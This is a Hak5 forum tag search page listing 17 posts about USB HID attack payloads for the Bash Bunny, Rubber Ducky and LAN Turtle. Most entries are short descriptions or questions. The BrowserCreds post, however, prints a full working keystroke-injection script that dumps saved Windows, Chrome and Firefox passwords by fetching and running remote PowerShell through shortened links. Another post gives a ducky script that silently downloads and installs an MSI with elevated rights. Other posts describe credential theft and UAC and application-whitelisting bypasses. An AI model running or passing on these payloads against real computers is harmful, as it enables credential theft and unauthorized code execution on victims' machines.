Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'HID'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple / Jasager
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • Mark V
    • Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • Mark I, II, III
  • Active Projects
    • Bash Bunny
    • Packet Squirrel
    • Lan Turtle
    • USB Rubber Ducky
    • SDR - Software Defined Radio
    • Community Projects
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Other Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 17 results

  1. {PAYLOAD] MrRobot

    So I wanted to mimic the Mimikatz ducky script that was used in Mr. Robot. I also figure that since theres an ethernet attack why not dl/upload from a small python webserver instead of sending externally. Plus dont have to worry about mounting the bunny drive to exfiltrate. Basically it starts with a HID powershell attack with UAC bypass, sleeps until the RDNIS ethernet attack starts, then resumes to download a mimidogz powershell script that executes in memory, then POSTs the results to python webserver. Finally the data is moved to the loot folder and the attack is done. https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/MrRobot
  2. Introducing the latest Composite Firmware - Codename : The Twin Duck The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. Its multi-OS, multi-lingual and comes in three flavours: c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions) c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK c_duck_v2_S002.hex - Triggered on Ducky's GPIO only! Depending on your circumstances, you may want to use either one of these available firmwares. Downloads http://code.google.c.../downloads/list Please test and post feedback here. Snake
  3. [PAYLOAD] BrowserCreds

    Was thinking of ways to dump browsercreds without the use Nirsoft programs, so screwing around with some powershell and some scripts i found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses powershell to webdl the scripts into memory and execute and store the results \loot\BrowserCreds\%computername%.txt. Tested on Win10 with Delays that worked for my laptop , so may need adjusting, let me know of any errors you come across https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt #!/bin/bash # # Title: BrowserCreds # Author: illwill # Version: 0.1 # # Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script # then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName% # Credits to these guys for their powershell scripts: # https://github.com/sekirkity/BrowserGather BrowserGather.ps1 # https://github.com/EmpireProject/Empire Get-FoxDump.ps1 #script # Blue...............Running Script # Purple.............Got Browser Creds LED R 200 LOOTDIR=/root/udisk/loot/BrowserCreds mkdir -p $LOOTDIR ATTACKMODE HID STORAGE LED B 200 # wait 6 seconds for the storage to popup Q DELAY 6000 Q GUI r Q DELAY 100 Q STRING POWERSHELL Q ENTER Q DELAY 500 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 #Dump Credential Vault (I.E./Edge) Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\; Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \| Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt Q ENTER Q DELAY 100 #Dump Chrome Creds Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER Q DELAY 2000 #Open 32bit powershell and Dump Firefox Creds Q GUI r Q DELAY 100 Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe Q ENTER Q DELAY 2000 Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q ENTER Q DELAY 100 Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt Q ENTER Q DELAY 100 Q STRING exit Q ENTER sync LED R B 200
  4. Well i'm not gonna lie I first saw this on another YouTube channel by the name Seytonic and I originally wasn't gonna show how to flash this and just demonstrate the various ducky code to Digispark code converters that came out since his video but I still hope you all enjoy and learn something from this video. PS: This device isn't as good as the USB Rubber Ducky but it's still very useful and cheap enough that if you lose it you got nothing to worry about. Click here for all links for all drivers and converters used in the video.
  5. Run admin Executable

    Hi, There is something i dont understand with the bash bunny... i dont know i feel like its too hard for my brain to understand how it works compared to the Rubber Ducky so i need some help I have this on a rubber ducky its pretty basic and does what i want: Starting an admin powershell Asking for admin and THEN running my command ( download a file output that file and run it quietly ) DELAY 1500 GUI r DELAY 1000 STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn"" ENTER DELAY 1000 ALT o ALT y So How would be the best way to do that without requiring the download because the file will be on the Bash Bunny either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program wont install correctly. i cant get to open an admin powershell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program ( time saver ) Thanks Alot
  6. The HID is coming from inside the Bunny!

    Is there a way from the Bash Bunny shell to control what the Bash Bunny "does to" the host? For example, if my payload just checks the OS version, connects to a Bash Bunny shell and starts a new script based on that? As one simple example, determining Windows XP (UAC evasion not required) vs Windows 7+ could be useful. Another case might be defaulting to, and then unloading, the ECM_ETHERNET module and replacing it with the RNDIS if we detect that we are on Windows. I realize that the latter case might be better handled using the Switch to change payloads... but doing something like I'm thinking could give me, effectively, more than 2 payloads. If I'm not using the right terminology I apologize... I'm just getting started. I can't find anything by searching but I could be looking for the wrong thing... In the long run some way to control what the Bunny does based on the Host OS would be useful. Thanks!
  7. [Payload] Rooter

    Discussion Thread for Root CA installer. (No Local Admin Rights necessary) current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working) pull request waiting. small Howto create self-signed-root-ca: Create the Root Certificate (Done Once) Creating the root certificate is easy and can be done quickly. Once you do these steps, you’ll end up with a root SSL certificate that you’ll install on all of your desktops, and a private key you’ll use to sign the certificates that get installed on your various devices. Create the Root Key The first step is to create the private root key which only takes one step. In the example below, I’m creating a 2048 bit key: openssl genrsa -out rootCA.key 2048 The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3: openssl genrsa -des3 -out rootCA.key 2048 You’ll be prompted to give a password, and from then on you’ll be challenged password every time you use the key. Of course, if you forget the password, you’ll have to do all of this all over again. The next step is to self-sign this certificate. openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit. You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:Oregon Locality Name (eg, city) []:Portland Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords Organizational Unit Name (eg, section) []:IT Common Name (eg, YOUR name) []:Data Center Overlords Email Address []:none@none.com Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
  8. Hi, My problem is that when i tried : ATTACKMODE HID STORAGE DUCKY_LANG ca LED R B QUACK DELAY 1500 LED B QUACK GUI r LED G QUACK DELAY 1000 LED R FAST QUACK STRING Powershell -WindowStyle............insert the magic here QUACK ENTER LED R G B It stays blinking red fast... indefinitely tried a couple things but idk is it related to my language been bad ? because in the languages i do have all the languages...
  9. [PAYLOAD] PSAttack

    For Windows targets with .NET 4.0 Opens powershell with UAC bypass, waits for webserver to start, determines if target is 32 or 64 bit, then downloads PSAttack .csproj file onto the target and compiles it within MSBuild using 'Inline Tasks' to bypass Application Whitelisting and Device Guard PSAttack from https://github.com/jaredhaight/psattack MSBuild Inline Task bypass from @subtee http://subt0x10.blogspot.nl/2016/09/bypassing-application-whitelisting.html PSA x32 & x64 .csproj files from Nicky Tyrer https://gist.github.com/NickTyrer/8389c3d5698511f5c81bc472ee49a11c https://github.com/xillwillx/BashBunny/tree/master/PSAttack
  10. Teensy or Rubber Ducky?

    I have recently found an article by Samy Kamkar regarding HID exploitation and was wondering which is better. (i understand preference but im more interested in the speed and flexibility aspect of the two as well as ease of deployment) Also, i was wondering if there was a way to turn a teensy into a faux Rubber ducky in regards to making it possible to use the Rubber Ducky coding language on a teensy?
  11. [PAYLOAD] PrivEscChecker

    https://github.com/xillwillx/BashBunny/tree/master/PrivEscChecker Checks Windows box for unpatched vulns that allow privilege escalation then outputs results to /root/udisk/loot/PrivEscChecker/%ComputerName%-%username% Can be used locally or webdls the script from github Credits to rasta-mouse for their powershell script: https://github.com/rasta-mouse/Sherlock Tested on: Windows 7 SP1 32-bit / Windows 7 SP1 64-bit / Windows 8 64-bit / Windows 10 64-bit LED Status Blue (blinking) Running Powershell script Purple (blinking) Checking Results Green (blinking) Found Possible Privilege Escalation Red (solid No Possible Privilege Escalation TO-DO Add more priv checks, Eventually add PowerShellMafia/PowerSploit to check for unquoted paths,dll hijacking, editable services, and other misconfigurations...
  12. KeeLog Keyboard Logger

    First off, thank you for creating such a remarkable device! I haven't stopped playing with this since it arrived yesterday afternoon. :) I have a USB keylogger from KeeLog.com and I either forgot the password or else there is something wrong with the unit. It's been a few years since I last played with it so I don't know what its issue is wrt the keyboard sequence. The way it works is that it passes though your keyboard to the host computer while logging the input. If you simultaneously press the secret keys, it will register the keylogger as a storage device. By default the secret keyboard sequence is KBS. Now these keys need to be pressed simultaneously and not one after the other. Therefore "QUACK STRING KBS" wont' work. I copied a snippit of the Ducky script for my purposes to being able to send raw keyboard sequences. Here is a script I named "K" to send these raw sequences: #!/usr/bin/env python import sys def hidg_write(elements): values = bytearray(elements) not_hold = bytearray([0, 0, 0, 0, 0, 0, 0, 0]) hidg = open("/dev/hidg0", "wb") hidg.write(values) hidg.write(not_hold) hidg.close() elements = sys.argv[1:] elements = [int(i, 16) for i in elements] hidg_write(elements) I then created the following NodeJS application to return every keyboard combination/ The output is a valid payload.txt. The "Combinatorics.bigCombination" returns a sequence that doesn't repeat. Therefore there would only be a entry for "KBS" and not for "SBK" or "KSB", etc. var Combinatorics = require('js-combinatorics'); console.log("source bunny_helpers.sh"); console.log("ATTACKMODE HID"); console.log("LED R"); console.log("QUACK DELAY 5000"); console.log("LED B 200"); var cmb, a; cmb = Combinatorics.bigCombination(["04", "05", "06", "07", "08", "09", "0a", "0b", "0c", "0d", "0e", "0f", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1d"], 3); while(a = cmb.next()) { console.log("K 00 00 " + a.join(" ") + " 00 00 00"); console.log("Q DELAY 500"); console.log("Q ENTER"); } console.log("LED G"); Connected to my keylogger, powered up the BashBunny to my attack switch, opened up a text editor to collect all of the key sequences... and while it went through each combination and correctly typed it into my editor... it didn't unlock the keylogger. :( While I'll continue with inserting additional delays, random keys, etc... I'm throwing this out here in hopes that someone may be able to see why this won't open up my keylogger. Thanks!
  13. [PAYLOAD] JackRabbit

    Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName% https://github.com/xillwillx/BashBunny/tree/master/JackRabbit tested on Win 7/8/10 may need to change some Delay timings and IE/Edge cred dump not working in 7
  14. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  15. [PAYLOAD] RickRoll Prank

    Uses a HID/Ethernet Attack to run a RickRoll powershell script https://github.com/xillwillx/bashbunny-payloads/tree/master/payloads/library/RickRoll
  16. Is this a Vulnerability for ducky?

    So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
  17. Hey, folks. I've tried using my LAN Turtle on a few engagements now, and while it's nice to show it plugged into a computer in the report, I rarely get much love out of it, and the shell feels too slow to be useful (guess that's why it's called a LAN Turtle! - It's a really slow shell!) Anyway - The idea that I wanted to float today is whether or not it would be possible to turn the LAN Turtle into a "TwinTurtle", similar to the "TwinDuck" firmware for the USB Rubber Ducky, but in this case, the LANTurtle would continue to be a USB-to-Ethernet adapter as well as acting as a HID device, so you could have a "blind terminal" into the machine it's physically plugged into. This could allow direct exploitation of the machine through powershell meterpreter, for example - The only problem I can think of is how to tell if the device is actually unlocked before sending the commands. So the reason I'm bringing this here is that I don't currently have the know-how to write a custom firmware which implements this sort of functionality, but I wanted to bring up the idea to the community, to see if this is something that is even possible, and if there are people willing and able to implement it.